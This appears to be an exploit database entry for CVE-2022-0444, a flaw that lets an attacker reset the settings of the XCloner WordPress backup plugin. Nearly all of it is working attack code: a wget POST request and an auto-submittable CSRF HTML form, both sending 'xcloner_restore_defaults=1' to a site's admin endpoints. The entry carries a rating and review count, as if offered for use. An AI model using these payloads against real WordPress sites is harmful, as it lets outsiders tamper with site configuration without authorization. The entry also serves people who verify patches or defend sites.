Exploit for XCloner < 4.3.6 - Plugin Settings Reset CVE-2022-0444

Name: Exploit for XCloner < 4.3.6 - Plugin Settings Reset CVE-2022-0444
Rating: 5 (79 reviews)

2022-06-06 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:9567D295-43C7-4E59-9283-C7726F16D40B
v < 4.3.5 - wget "http://example.com/wp-admin/admin.php?action=rest-nonce" --post-data="xcloner_restore_defaults=1" -q -O-

v < 4.3.6 (via CSRF):

<form id="test" action="http://example.com/wp-admin/admin-ajax.php?action=rest-nonce" method="POST">
    <input type="text" name="xcloner_restore_defaults" value="1">
    <input type="submit" value="Submit"/>
</form>